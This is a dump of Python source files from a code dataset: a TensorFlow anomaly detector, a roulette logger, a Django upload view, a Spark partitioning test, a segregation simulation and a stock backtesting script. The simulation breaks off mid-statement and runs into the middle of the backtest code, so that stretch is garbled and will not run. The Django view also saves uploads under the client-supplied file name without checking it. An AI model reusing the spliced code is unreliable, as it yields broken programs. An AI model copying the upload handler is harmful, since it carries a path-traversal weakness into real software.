epoch+1)\n self.save(config.checkpoint_dir, counter, epoch+1)\n print(\" [!] Training is Done...\")\n\n def classifier(self, image, reuse=False):\n with tf.variable_scope(\"classifier\") as scope:\n if reuse:\n scope.reuse_variables()\n else:\n self.bn1 = batch_norm(self.is_train, name='c_bn1')\n self.bn2 = batch_norm(self.is_train, name='c_bn2')\n self.bn3 = batch_norm(self.is_train, name='c_bn3')\n if self.data_type =='image':\n if self.dataset_name == \"mnist\":\n h0 = leak_relu(conv2d(image, int(self.net_dim/2), st=1, name='c_h0_conv'))\n h1 = leak_relu(self.bn1(conv2d(h0, self.net_dim, name='c_h1_conv')))\n h2 = leak_relu(self.bn2(conv2d(h1, self.net_dim*2, name='c_h2_conv')))\n h3 = linear(h2, self.y_dim, 'c_h3_lin')\n return tf.nn.softmax(h3), h3\n\n else:\n h0 = leak_relu(conv2d(image, int(self.net_dim/2), name='c_h0_conv'))\n h1 = leak_relu(self.bn1(conv2d(h0, self.net_dim, name='c_h1_conv')))\n h2 = leak_relu(self.bn2(conv2d(h1, self.net_dim*2, name='c_h2_conv')))\n h3 = leak_relu(self.bn3(conv2d(h2, self.net_dim*4, name='c_h3_conv')))\n h4 = linear(h3, self.y_dim, 'c_h4_lin')\n return tf.nn.softmax(h4), h4\n else:\n assert False\n\n def get_test_data(self):\n\n if self.dataset is not None:\n self.test_data_names = ['{}_test_data_{:05}'.format(self.dataset_name, i)\n for i in range(len(self.test_y))]\n self.test_data = self.test_x\n else:\n self.test_data_names = glob(self.test_dir+'/*.*')\n batch = [get_image(name, input_height=self.input_height, input_width = self.input_width,\n resize_height = self.output_height, resize_width = self.output_width,\n crop = self.crop, grayscale=self.grayscale) for name in self.test_data_names]\n if self.grayscale:\n batch_images = np.array(batch).astype(np.float32)[:,:,:,None]\n else:\n batch_images = np.array(batch).astype(np.float32)\n #print np.shape(batch_images)\n self.test_data = batch_images\n print (\"[*] test data for anomaly detection is loaded\")\n\n\n def build_anomaly_detector(self):\n self.get_test_data()\n if self.data_type == 'image':\n self.test_inputs = tf.placeholder(tf.float32, [None] + self.image_dims, name='test_images')\n\n self.test_labels = tf.placeholder(tf.float32, [None, self.y_dim], name='test_labels')\n\n self.test_score, self.test_logits = self.classifier(self.test_inputs, reuse=True)\n self.anomal_score = - tf.reduce_sum(tf.multiply(self.test_labels, self.test_score))\n return self.model_dir, ['anomaly_score']\n\n def anomaly_detector(self, test_data, test_data_name, config):\n\n if self.dataset:\n y_i = int(test_data_name.split('_')[-1])\n is_anomal = self.test_y[y_i] in self.excluded\n if self.data_type == 'image':\n test_data_name = test_data_name+'.jpg'\n\n test_geo_data, test_geo_label = geometric_transformation(test_data)\n\n feed_dict = {self.test_inputs : test_geo_data,\n self.test_labels: test_geo_label,\n self.is_train:False}\n anomal_score = self.sess.run(self.anomal_score, feed_dict = feed_dict)\n if config.verbose:\n if self.dataset:\n print(\"[{:05d}]th sample Label: [{}:{}] anomaly score(enc_loss): {:.8f}\"\\\n .format(y_i, self.test_y[y_i], is_anomal, anomal_score))\n else:\n print(\"anomaly score: {:.8f} :by feature matching, {:.8f}:by cross-entropy\"\\\n .format(ano_feature, ano_cross))\n\n return [anomal_score], is_anomal\n @property\n def model_dir(self):\n if self.excluded and self.dataset:\n return \"{}_{}{}_{}_{}{}_{}\".format(\n self.dataset_name,self.balancing, self.batch_size, self.output_height, self.output_width,self.variance, tuple(self.excluded))\n else:\n return \"{}_{}{}_{}{}_{}\".format(\n self.dataset_name,self.balancing,self.batch_size, self.output_height, self.output_width,self.variance)\n","sub_path":"models/dadugt.py","file_name":"dadugt.py","file_ext":"py","file_size_in_byte":8231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"556412086","text":"from games.roulette import roulette\n\nclass report_generator():\n\n loggingEnabled = True;\n\n @staticmethod\n def log_game(roll_number):\n if report_generator.loggingEnabled == True:\n print(\"game: \"+ str(roll_number))\n\n @staticmethod\n def log_result(result):\n print(\"\")\n print(\"result: \"+str(result))\n\n @staticmethod\n def log_player_account_change(account_delta, account):\n print(\"account changed of: \" + str(account_delta))\n print(\"account new amount: \" + str(account))\n\n @staticmethod\n def log_player_bet_change(new_bet):\n if report_generator.loggingEnabled == True:\n for bet_type, bet_dict in new_bet.iteritems():\n print(\"bet type: \"+bet_type),\n for bet_target, bet_amount in bet_dict.iteritems():\n if type(bet_target) == str:\n print(bet_target+\": \"+str(bet_amount)),\n elif type(bet_target) == int:\n print(str(bet_target)+ \": \"+str(bet_amount)),\n print(\"\")\n print(\"bet multiplier: \" + str(roulette.get_multiplier(bet_type)))\n\n\n def log_multiplier(multiplier):\n print(\"multiplier: \"+multiplier)\n\n def log_profit(profit):\n print(\"profit: \"+profit)\n\n\n\n def printReport(self):\n for key, value in self.rolls.iteritems():\n for key2, value2, in value:\n print(\"roll: \"+key2, \"result: \"+value2[\"result\"], \"multiplier \"+value2[\"multiplier\"],\n \"profit: \"+value2[\"profit\"], \"player_account: \"+value2[\"player_account\"])","sub_path":"reports/report_generator.py","file_name":"report_generator.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"482750044","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom .form import UploadFileForm\nfrom django.views.generic import View\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom django.conf import settings\n\nimport logging\n\n# Create your views here.\n\n\nclass FileUploadView(View):\n form_class = UploadFileForm\n #success_url = reverse_lazy('home')\n template_name = 'upload.html'\n\n def get(self, request, *args, **kwargs):\n form = self.form_class()\n return render(request, 'upload.html', {'form': form})\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST, request.FILES)\n\n if form.is_valid():\n form.save()\n\n return self.handle_uploaded_file(request.FILES['filename'])\n\n else:\n logging.error(form.errors)\n return self.return_fmessage()\n\n def return_smessage(self, filepath):\n output = \"\"\"\n \n \n \n \n \n Success upload to
{path}\n \n \n \"\"\".format(path=filepath)\n\n return HttpResponse(output)\n\n def return_fmessage(self, name=''):\n output = \"\"\"\n \n \n \n \n \n\n

Invalid
{name1}

\n\n \n \n \"\"\".format(name1=name)\n\n return HttpResponse(output)\n\n def handle_uploaded_file(self, file):\n\n filepath = settings.MEDIA_ROOT\n filename = file.name\n\n filefullpath = filepath + filename\n\n with open(filefullpath, 'wb+') as destination:\n for chunk in file.chunks():\n destination.write(chunk)\n\n return self.return_smessage(filefullpath)\n","sub_path":"mysite/uploadfiles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"245096852","text":"import pyspark\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import substring\nfrom operator import add\nimport matplotlib.pyplot as plt\n\n\"\"\"\n A simple script exploring examples of different spark partitioners on structure of resulting partitions.\n\n To execute, on a Windows machine with standalone spark:\n\n spark-submit.cmd --master local[2] spark_test.py\n\n (if in a cluster w/ yarn or mesos, change master and other cmd-line params as desired)\n\"\"\"\n\nsmallCsvFile = \"example.csv\"\nlargeCsvFile = \"bigExample.csv\"\nSMALL_NUM_REPARTITIONS = 4 # Choose how many partitions to use in each repartitioning strategy for small examples.\nLARGE_NUM_REPARTITIONS = 100 # Choose how many partitions to use in each repartitioning strategy for large examples.\n\ndef quiet_logs(sc):\n logger = sc._jvm.org.apache.log4j\n logger.LogManager.getLogger(\"org\"). setLevel( logger.Level.ERROR )\n logger.LogManager.getLogger(\"akka\").setLevel( logger.Level.ERROR )\n\ndef smallRddExample(sc):\n assert True == False, \"Thou shallt not pass. ('cuz this an't implemented yet)\"\n\ndef largeRddExample(sc):\n assert True == False, \"Thou shallt not pass. ('cuz this an't implemented yet)\"\n\n#def makeBarChart():\n\ndef countDistinctGeocodes(partition, geocodeLen=6):\n distinctGeocodes = set([])\n for record in partition:\n geocode = record[0][:geocodeLen]\n distinctGeocodes.add(geocode)\n return len(distinctGeocodes)\n\ndef listOfGeocodes(partition, geocodeLen=6):\n distinctGeocodes = set([])\n for record in partition:\n geocode = record[0][:geocodeLen]\n distinctGeocodes.add(geocode)\n return distinctGeocodes\n\ndef getAndPrintRddStatistics(df, mode=\"small\"):\n rdd = df.rdd.glom() # Convert rdd to partitions equivalent\n\n # If small example, explicitly display rdd partitions in STDOUT\n if mode == \"small\":\n print(f\"The df.rdd contains {rdd.getNumPartitions()} partitions:\")\n for partition in rdd.collect():\n print(partition)\n\n # How many partitions were there in total?\n numPartitions = rdd.getNumPartitions()\n print(f\"Found {numPartitions} partitions in rdd\")\n\n # Of those, how many partitions were empty?\n numEmpty = rdd.map(lambda partition: 1 if len(partition) == 0 else 0).reduce(add)\n print(f\"Of those, {numEmpty} were empty\")\n\n # What was the distribution of partition sizes?\n sizes = rdd.map(lambda partition: (len(partition), 1) ).reduceByKey(add).collect()\n print(\"distribution of partition sizes:\")\n print(sizes)\n\n lengths = [6,7,11] if mode == \"large\" else [1,2,3]\n # For each geolevel, how many distinct tract, county, block codes were there in total?\n tracts = rdd.map(lambda partition: listOfGeocodes(partition, lengths[0])).reduce(set.union)#.map(lambda setOfGeocodes: len(setOfGeocodes)).collect()\n print(f\"number of tracts in total: {len(tracts)}\")\n blockgroups = rdd.map(lambda partition: listOfGeocodes(partition, lengths[1])).reduce(set.union)#.map(lambda setOfGeocodes: len(setOfGeocodes)).collect()\n print(f\"number of blockgroups in total: {len(blockgroups)}\")\n blocks = rdd.map(lambda partition: listOfGeocodes(partition, lengths[2])).reduce(set.union)#.map(lambda setOfGeocodes: len(setOfGeocodes)).collect()\n print(f\"number of blocks in total: {len(blocks)}\")\n\n # For each geolevel, how many distinct tract, county, or block codes were in each partition?\n numTracts = rdd.map(lambda partition: (countDistinctGeocodes(partition, geocodeLen=lengths[0]), 1)).reduceByKey(add).collect()\n totalTracts = sum([a*b for a, b in numTracts])\n print(f\"distribution of #tracts per partition:\")\n print(numTracts)\n print(f\"total: {totalTracts}, min: {min([a for a,b in numTracts])}, max: {max([a for a,b in numTracts])}\")\n numBlockgroups = rdd.map(lambda partition: (countDistinctGeocodes(partition, geocodeLen=lengths[1]), 1)).reduceByKey(add).collect()\n totalBlockgroups = sum([a*b for a, b in numBlockgroups])\n print(f\"distribution of #blockgroups per partition:\")\n print(numBlockgroups)\n print(f\"total: {totalBlockgroups}, min: {min([a for a,b in numBlockgroups])}, max: {max([a for a,b in numBlockgroups])}\")\n numBlocks = rdd.map(lambda partition: (countDistinctGeocodes(partition, geocodeLen=lengths[2]), 1)).reduceByKey(add).collect()\n totalBlocks = sum([a*b for a, b in numBlocks])\n print(f\"distribution of #blocks per partition:\")\n print(numBlocks)\n print(f\"total: {totalBlocks}, min: {min([a for a,b in numBlocks])}, max: {max([a for a,b in numBlocks])}\")\n\n # On avg, for each geolevel, how many partitions was each tract, county, or block code in?\n # (not yet implemented; a little more complicated than distribution of #geounits per partition)\n\n print(\"---------------------\\n\")\n\ndef dfAnalysisDriver(sc, mode=\"small\"):\n \"\"\"\n This example is too big for prints of glom().collect() to work, so we instead measure:\n\n - On avg for each geolevel, how many partitions was each tract, county, or block code in?\n - How many partitions were empty?\n - How many partitions were there in total?\n - What was the distribution of partition sizes?\n \"\"\"\n print(f\"*** Executing dataframes analysis driver in mode {mode} ***\")\n numRepartitions = LARGE_NUM_REPARTITIONS if mode==\"large\" else SMALL_NUM_REPARTITIONS\n csvFile = largeCsvFile if mode==\"large\" else smallCsvFile\n aggLen = 7 if mode==\"large\" else 4\n\n sqlContext = SQLContext(sc)\n print(f\"Loading {csvFile} into dataframe...\")\n df1 = sqlContext.read.format(\"csv\").option(\"header\", \"true\").load(csvFile)\n df1.printSchema()\n numRecords, numCols = df1.count(), len(df1.columns)\n print(f\"numRecords: {numRecords}, numCols: {numCols}\")\n\n df1 = df1.withColumn(\"partitionCode\", substring(\"geocode\",0,aggLen)) # Initial df\n df2 = df1.repartition(numRepartitions) # Default hash code repartitioning\n df3 = df1.repartition(numRepartitions, 'partitionCode').drop('partitionCode') # hashCode repartition based on partitionCode\n df4 = df1.repartitionByRange(numRepartitions, 'partitionCode').drop('partitionCode') # range repartition based on partitionCode\n dfs = [df1, df2, df3, df4]\n dfLabels = [\"initial\",\"hash default repartition\",\"hash repartition by partitionCode\", \"range repartition by partitionCode\"]\n for df, dfLabel in zip(dfs, dfLabels):\n print(f\"Processing example spark dataframe: {dfLabel}\")\n print(\"dataframe schema:\")\n df.printSchema()\n getAndPrintRddStatistics(df, mode=mode)\n\n print(\"<--- Done analysis. ---> \\n\\n\")\n\ndef main():\n sc = pyspark.SparkContext()\n quiet_logs(sc)\n dfAnalysisDriver(sc, mode=\"small\")\n dfAnalysisDriver(sc, mode=\"large\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"spark_partitioning_tests.py","file_name":"spark_partitioning_tests.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"94767428","text":"#初始实验\nimport matplotlib\n#for Canopy users\nimport matplotlib.animation as animation\n#for EPD users\n#matplotlib.use('TkAgg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random as rnd\n\n# set parameters\nN= 50\nT= 100\nW= 30\nSEED=101\nagents= []\n\n#TH=0.3\ncolorlist=['red', 'blue']\n\n\n## define functions\ndef clip(x):\n if x<0:\n return(x+W)\n elif x>=W:\n return(x-W)\n else:\n return(x)\n\n## define classes\nclass Agent(object):\n def __init__(self, sp):\n self.x= rnd.randint(0, W-1)\n self.y= rnd.randint(0, W-1)\n self.p= sp\n self.s= 0\n\n def randomwalk(self):\n self.x+= rnd.randint(-1, 1)\n self.y+= rnd.randint(-1, 1)\n self.x= clip(self.x)\n self.y= clip(self.y)\n\n def isOverlapped(self):\n for a in agents:\n if((a.x==self.x and a.y==self.y) and (a!=self)):\n return(True)\n return(False)\n\n def findNewSpace(self):\n self.randomwalk()\n if(self.isOverlapped()==True):\n self.findNewSpace()\n\n def updateSatisfaction(self):\n neighbors= [a for a in agents \\\n if (abs(a.x-self.x)<=1 and \\\n abs(a.y-self.y)<=1) and a!=self]\n neighborsCount= len(neighbors)\n\n sameCount= len([a for a in neighbors \\\n if (a.p==self.p)])\n self.s= (float(sameCount)/float(neighborsCount) \\\n if neighborsCount!=0 else 0.0)\n\n def seek(self):\n self.updateSatisfaction()\n if(self.s 实际买入数:对卖出列表进行排序\n #if len(sellList) > numOfActualBuy:\n sellList = getToSellInSellList(sellList,tradingDate,signalData,dailyQuote,numOfToKeepInSellList,cannotSellList,currHoldSet)\n if len(sellList) == 0:\n return\n\n #numOfActualSell = 0\n for innerCode in sellList:\n #print('innerCode:' + str(innerCode))\n try:\n dailyQuoteRow = SourceDataDao.select_by_inner_code_and_date(dailyQuote, tradingDate, innerCode)\n except:\n #退市的股票: 查询不到行情,取最后一个交易日\n dailyQuoteRow = SourceDataDao.selectByLastDay(dailyQuote,innerCode)\n #print('innerCode:' + str(innerCode))\n # print(dailyQuoteSingle)\n #try:\n turnoverValue = dailyQuoteRow[\"TurnoverValue\"]\n #except:\n #print('tradingDate:'+dateStr)\n #print('innerCode:' + str(innerCode))\n #print(dailyQuoteRow)\n turnoverVolume = dailyQuoteRow[\"TurnoverVolume\"]\n #prevClosePrice = dailyQuoteRow[\"PrevClosePrice\"]\n #closePrice = dailyQuoteRow[\"ClosePrice\"]\n #highPrice = dailyQuoteRow[\"HighPrice\"]\n #lowPrice = dailyQuoteRow[\"LowPrice\"]\n #sellFlg = dailyQuoteRow[StockConst.sellFlg]\n #buyFlg = dailyQuoteRow[\"buyFlg\"]\n #sellFlg = dailyQuoteRow[\"sellFlg\"]\n #非停牌\n #check1 = not BackTestHelper.isStop(closePrice, turnoverValue)\n #非一字跌停: 可以卖出\n #check2 = not BackTestHelper.isYiZiDieTing(highPrice,lowPrice,prevClosePrice)\n\n #可卖\n #if sellFlg != -1:\n #实际卖出数不能大于实际买入数\n #if numOfActualSell >= numOfActualBuy:\n #continue\n actualSellList.append(innerCode)\n stockHoldEntity = currHoldSet.pop(innerCode)\n vol = stockHoldEntity.vol\n sellPrice = turnoverValue / turnoverVolume\n #卖出后所得资金(没有扣佣金)\n turnover = sellPrice * vol\n # 佣金(元)\n commission = BackTestHelper.get_sell_commission(turnover, StockConst.SELL_COMMISSION / 100)\n # 扣掉佣金后所得金额\n turnover = turnover - commission\n # 更新可用金额(增加)\n capitalEntity.increase_usable_cash(turnover)\n # 加入交易表\n stockTradeDict = {'tradingDate': tradingDate, 'innerCode': innerCode, 'type': -1, 'vol': vol, 'price': sellPrice,\n 'turnover': turnover, 'commission': commission}\n stockTradeList.append(stockTradeDict)\n #实际卖出数\n #numOfActualSell += 1\n \"\"\"\n if DateUtil.datetime2Str(tradingDate) == '2014-12-09':\n print('-----handleSellList-----')\n print(DateUtil.datetime2Str(tradingDate))\n print(innerCode)\n print(vol)\n print(sellPrice)\n print(turnoverValue)\n print(dailyQuoteRow)\n print('----------')\n \"\"\"\n\n #changePCT = NumUtil.getChangePCT(prevClosePrice, sellPrice, 2)\n #realChangePCT = (changePCT - StockConst.sellCommission) * vol / 100.0\n #partChangePCT = partChangePCT + realChangePCT\n \"\"\"\n if dateStr == '2001-01-17':\n print(\"vol:\"+str(vol)+\" turnoverValue:\"+str(turnoverValue)+\" turnoverVolume:\"+str(turnoverVolume)+\n \" prevClosePrice:\"+str(prevClosePrice)+\" closePrice:\"+str(closePrice)+\" sellPrice:\"+str(sellPrice)+\n \" changePCT:\"+str(changePCT)+\n \" realChangePCT:\"+str(realChangePCT)+\" partChangePCT:\"+str(partChangePCT))\n \"\"\"\n #else:\n #cannotSellList.append(innerCode)\n #return partChangePCT\n\n\"\"\"\ndef handleHoldList(tradingDate,holdList,dailyQuote,usableVol,stockHoldDF,stockTradeDF,currHoldSet):\n partChangePCT = 0\n #dateStr = DateUtil.datetime2Str(tradingDate)\n if len(holdList) == 0:\n return 0\n\n for innerCode in holdList:\n dailyQuoteRow = SourceDataDao.selectByInnerCodeAndDate(dailyQuote, tradingDate, innerCode)\n #print('innerCode:' + str(innerCode))\n # print(dailyQuoteSingle)\n turnoverValue = dailyQuoteRow[\"TurnoverValue\"]\n #turnoverVolume = dailyQuoteRow[\"TurnoverVolume\"]\n prevClosePrice = dailyQuoteRow[\"PrevClosePrice\"]\n closePrice = dailyQuoteRow[\"ClosePrice\"]\n #非停牌\n if (closePrice != 0) & (turnoverValue != float(0)):\n vol = currHoldSet.get(innerCode)\n changePCT = NumUtil.getChangePCT(prevClosePrice, closePrice, 2)\n realChangePCT = changePCT * vol / 100.0\n partChangePCT = partChangePCT + realChangePCT\n\n return partChangePCT\n\"\"\"\n\n#今日选股和昨日选股的差集\n#currSourceData: dataFrame\n#currHoldSet: dict\n#return: innerCode list\n#currList - lastList\ndef getDifference(currSourceData, currHoldSet, typ):\n currList = []\n lastList = []\n\n if len(currSourceData) != 0:\n #for index, row in currSourceData.iterrows():\n #currList.append(index[1])\n currList = list(currSourceData.index.get_level_values(1))\n\n if len(currHoldSet) != 0:\n #for innerCode in currHoldSet:\n #lastList.append(innerCode)\n lastList = list(currHoldSet.keys())\n lastList.sort()\n\n #currList - lastList\n if typ == 1:\n returnList = SetUtil.difference(currList, lastList)\n #lastList - currList\n else:\n returnList = SetUtil.difference(lastList, currList)\n return returnList\n\n\n#今日选股和昨日选股的交集\n#currSourceData: dataFrame\n#currHoldSet: dict\n#return: innerCode list\n#currList 交集 lastList\ndef getIntersection(currSourceData, currHoldSet):\n currList = []\n lastList = []\n\n if len(currSourceData) != 0:\n #for index, row in currSourceData.iterrows():\n #currList.append(index[1])\n currList = list(currSourceData.index.get_level_values(1))\n\n if len(currHoldSet) != 0:\n #for innerCode in currHoldSet:\n #lastList.append(innerCode)\n lastList = list(currHoldSet.keys())\n lastList.sort()\n\n returnList = SetUtil.intersection(currList, lastList)\n return returnList\n\n#买入列表\ndef getBuyList(currSourceData, currHoldSet):\n return getDifference(currSourceData,currHoldSet,1)\n\n#卖出列表\ndef getSellList(currSourceData, currHoldSet):\n return getDifference(currSourceData,currHoldSet,-1)\n\n#昨日持有列表\ndef getPrevHoldList(currSourceData, currHoldSet):\n return getIntersection(currSourceData,currHoldSet)\n\n#遍历持仓表\n\"\"\"\ndef calculateUsableVol(currHoldSet):\n currVol = 0;\n for innerCode in currHoldSet:\n vol = currHoldSet[innerCode]\n currVol = currVol + vol\n return 100 - currVol\n\"\"\"\n\n#计算当日总市值:股票市值+可用资金\n#closePrice mv放入持仓表\ndef calculateDailyMV(currHoldSet,capitalEntity,dailyQuote,tradingDate,stockHoldDailyList,initialMV):\n usableCach = capitalEntity.get_usable_cash()\n dailyMV = 0\n for innerCode in currHoldSet:\n dailyQuoteRow = SourceDataDao.select_by_inner_code_and_date(dailyQuote, tradingDate, innerCode)\n stockHoldEntity = currHoldSet[innerCode]\n vol = stockHoldEntity.vol\n # print('innerCode:' + str(innerCode))\n closePrice = dailyQuoteRow[\"ClosePrice\"]\n mv = vol * closePrice\n dailyMV += mv\n #stockHoldEntity.setClosePrice(closePrice)\n #stockHoldEntity.setMV(mv)\n cost = stockHoldEntity.cost\n profit = (closePrice-cost) *vol\n\n holdDict = {'tradingDate': tradingDate,\n 'innerCode': innerCode,\n 'vol': vol,\n 'buyPrice': stockHoldEntity.buyPrice,\n 'cost': cost,\n 'closePrice': closePrice,\n 'mv': mv,\n 'profit': profit,\n 'profitPCT': NumUtil.get_round(profit / initialMV * 100, 5)}\n\n stockHoldDailyList.append(holdDict)\n #print('dailyMV:' + str(dailyMV))\n #print('usableCach:' + str(usableCach))\n dailyMV = dailyMV + usableCach\n return dailyMV\n\n\"\"\"\n#stockHoldDaily: 每日持仓表\n#currHoldSet转stockHoldDailyList\ndef handleStockHoldDaily(currHoldSet, stockHoldDailyList, tradingDate):\n #print('--------------------')\n for innerCode in currHoldSet:\n stockHoldEntity = currHoldSet[innerCode]\n #print('tradingDate:'+DateUtil.datetime2Str(tradingDate)+'innerCode:'+str(innerCode))\n holdDict = {'tradingDate':tradingDate,\n 'innerCode':innerCode,\n 'vol':stockHoldEntity.vol,\n 'closePrice': stockHoldEntity.closePrice,\n 'mv': stockHoldEntity.mv}\n stockHoldDailyList.append(holdDict)\n\"\"\"\n\ndef debugDailyQuote(groupedSignalData):\n \"\"\"\n # 行情数据Debug\n #dailyQuoteToDebug = pd.DataFrame()\n signalDataToDebug = groupedSignalData.ix['2001-07-30']\n print('行情数据:')\n print('signalDataToDebug:'+str(len(signalDataToDebug)))\n for index, row in signalDataToDebug.iterrows():\n tradingDate = index[0]\n innerCode = index[1]\n dailyQuoteRow = SourceDataDao.selectByInnerCodeAndDate(dailyQuote, tradingDate, innerCode)\n #dailyQuoteToDebug.append(dailyQuoteRow)\n print(dailyQuoteRow)\n #dailyQuoteToDebug.to_csv(StockConst.root + '\\export\\dailyQuoteToDebug.csv')\n \"\"\"\n\n#主程序\n@TimeUtil.check_consumed_time2\ndef main():\n signalData = SourceDataDao.getSignalData()\n #dailyQuote = SourceDataDao.getDailyQuote()\n dailyQuote = SourceDataDao.getNewDailyQuote()\n\n #columns filter\n #df3 = sourceData.loc[(df['Mom'] <= 4) & (df['Mom'] <= 4), ['Mom']]\n\n #index filter\n #startDate=DateUtils.str2Datetime('20010105');\n #endDate=DateUtils.str2Datetime('20010111');\n #df4 = df3.ix[startDate:endDate]\n\n numOfDailyHolding = 5\n\n #select top 5 group by TradingDay order by Mom desc\n groupedSignalData = signalData.groupby(level='TradingDay').apply(SelectUtil.top,numOfDailyHolding,'Mom',False)\n\n #param\n #period = 5\n #startDate = '1/8/2001'\n startDate = '1/8/2001'\n #endDate = '1/1/2017'\n #eendDate = '5/18/2001'\n endDate = '12/31/2016'\n #endDate = '12/31/2002'\n #endDate = '1/9/2001'\n\n #time series\n #dateList = DateUtil.getDateList2(startDate,endDate)\n\n #当前持仓 key:innerCode value:\n currHoldSet = {}\n stockHoldDF = {}\n stockTradeList = []\n #资金情况\n #capitalDict = {'usableCach':1000000}\n #初始资金\n initialMV = 1000000\n capitalEntity = CapitalEntity.CapitalEntity(initialMV)\n lastMV = initialMV\n\n #lastSignalData = pd.DataFrame()\n usableVol = 100;\n netValue = 1;\n #初始化每日统计表\n stockStatDailyDf = pd.DataFrame(index=pd.date_range(startDate, endDate),\n columns=['netValue','changePCT','buyCnt','sellCnt','prevHoldCnt','currHoldCnt','cannotSellCnt','cannotBuyCnt',\n 'usableCach','mv'])\n #初始化每日持仓表\n stockHoldDailyList = []\n #从信号表中取得唯一性日期\n dateList = SourceDataDao.select_date_from_signal(signalData, startDate, endDate)\n for date in dateList:\n dateStr = DateUtil.datetime2_str(date)\n #print(dateStr)\n #isinstance(date, datetime)\n\n # select by single date\n #try:\n\n #print(1)\n currSignalData = groupedSignalData.ix[date]\n if StockConst.IS_DEBUG:\n print(\"currSignalData:\"+str(len(currSignalData)))\n #print(2)\n buyList = getBuyList(currSignalData,currHoldSet)\n #print(3)\n sellList = getSellList(currSignalData,currHoldSet)\n #print(4)\n prevHoldList = getPrevHoldList(currSignalData,currHoldSet)\n #print(currSignalData)\n \"\"\"\n if (dateStr >= '2015-01-05') & (dateStr <= '2015-01-05'):\n print('-----'+dateStr+'-----')\n #print(currSignalData)\n #print(buyList)\n print(list(currHoldSet.keys()))\n for key in currHoldSet.keys():\n print(str(key) + ':' + currHoldSet.get(key).openDate)\n print('----------------')\n \"\"\"\n #except:\n #假期,双休日,原数据问题\n #if StockConst.isDebug:\n #print(DateUtil.datetime2Str(date) + ': no data')\n #continue\n\n dailyChangePCT = 0\n actualSellList=[]\n actualBuyList=[]\n cannotSellList=[]\n cannotBuyList = []\n\n #实际买入个数\n numOfActualBuy = getNumOfActualBuy(date, buyList, dailyQuote)\n #1.sell changePCTSell\n handleSellList(date,sellList,dailyQuote,usableVol,stockHoldDF,stockTradeList,currHoldSet,actualSellList,cannotSellList,\n capitalEntity,numOfActualBuy,signalData,prevHoldList,numOfDailyHolding)\n #usableVol = calculateUsableVol(currHoldSet)\n #2.buy changePCTBuy\n handleBuyList(date,buyList,dailyQuote,usableVol,stockHoldDF,stockTradeList,currHoldSet,actualBuyList,cannotBuyList,capitalEntity)\n #3.hold\n #changePCTHold = handleHoldList(date,prevHoldList,dailyQuote,usableVol,stockHoldDF,stockTradeDF,currHoldSet)\n #changePCTHold = 0\n\n currMV = calculateDailyMV(currHoldSet, capitalEntity, dailyQuote, date, stockHoldDailyList, initialMV)\n\n #handleStockHoldDaily(currHoldSet, stockHoldDailyList, date)\n\n buyCnt = len(actualBuyList)\n sellCnt = len(actualSellList)\n prevHoldCnt = len(prevHoldList)\n currHoldCnt = len(currHoldSet)\n cannotSellCnt = len(cannotSellList)\n cannotBuyCnt = len(cannotBuyList)\n\n #if StockConst.isDebug:\n #print(\"dateStr:\" + dateStr + \" changePCTBuy:\" + str(changePCTBuy) + \" changePCTSell:\" + str(changePCTSell) +\n #\" changePCTHold:\" + str(changePCTHold))\n\n #dailyChangePCT = changePCTBuy+changePCTSell+changePCTHold\n #print(\"dailyChangePCT:\"+str(dailyChangePCT))\n #netValue = netValue * (1 + dailyChangePCT / 100)\n #每日净值\n netValue = currMV / initialMV\n #print(\"netValue:\" + str(netValue))\n #每日收益\n dailyChangePCT = NumUtil.get_change_pct(lastMV, currMV, 2)\n #每日可用现金\n usableCach = capitalEntity.get_usable_cash()\n stockStatDailyDf.ix[dateStr] = netValue,dailyChangePCT,buyCnt,sellCnt,prevHoldCnt,currHoldCnt,cannotSellCnt,cannotBuyCnt,usableCach,currMV\n\n lastMV = currMV\n\n #debug 行情数据\n debugDailyQuote(groupedSignalData)\n\n # 信号数据\n #groupedSignalData.to_csv(StockConst.root + '\\export\\groupedSignalData.csv')\n\n # 每日交易\n # print('每日交易:')\n stockTradeDailyDf = pd.DataFrame(stockTradeList)\n stockTradeDailyDf.sort_values(by=['tradingDate'], ascending=True)\n stockTradeDailyDf.to_csv(StockConst.ROOT + '\\export\\stockTradeDaily.csv')\n\n # 每日持仓\n #print('每日持仓:')\n stockHoldDailyDf = pd.DataFrame(stockHoldDailyList)\n stockHoldDailyDf.sort_values(by=['tradingDate'],ascending=True)\n stockHoldDailyDf.to_csv(StockConst.ROOT + '\\export\\stockHoldDaily.csv')\n\n #每日统计(收益,净值,买入数,卖出数,持有数)\n stockStatDailyDf = stockStatDailyDf.dropna(how='all')\n print('每日统计:')\n print(stockStatDailyDf)\n stockStatDailyDf.to_csv(StockConst.ROOT + '\\export\\stockStatDaily.csv')\n\n # 每年统计\n yearDf = StockYearService.main(stockStatDailyDf)\n print('每年统计:')\n print(yearDf)\n\n # 最大回撤\n maxdrop = StockMaxDropNewService.get_max_drop(stockStatDailyDf)\n print('最大回撤:')\n print(maxdrop)\n #每年的最大回撤\n maxdropDf = StockMaxDropNewService.get_max_drop_for_each_year(stockStatDailyDf)\n maxdropDf.sort_values(by=[\"year\"])\n print('每年的最大回撤:')\n print(maxdropDf)\n\n #夏普比率\n sharpRatio = SharpRatioNewService.get_sharp_ratio(stockStatDailyDf)\n print('夏普比率:')\n print(sharpRatio)\n #每年的夏普比率\n sharpRatioDf = SharpRatioNewService.get_sharp_ratio_for_each_year(stockStatDailyDf)\n sharpRatioDf.sort_values(by=[\"year\"])\n print('每年的夏普比率:')\n 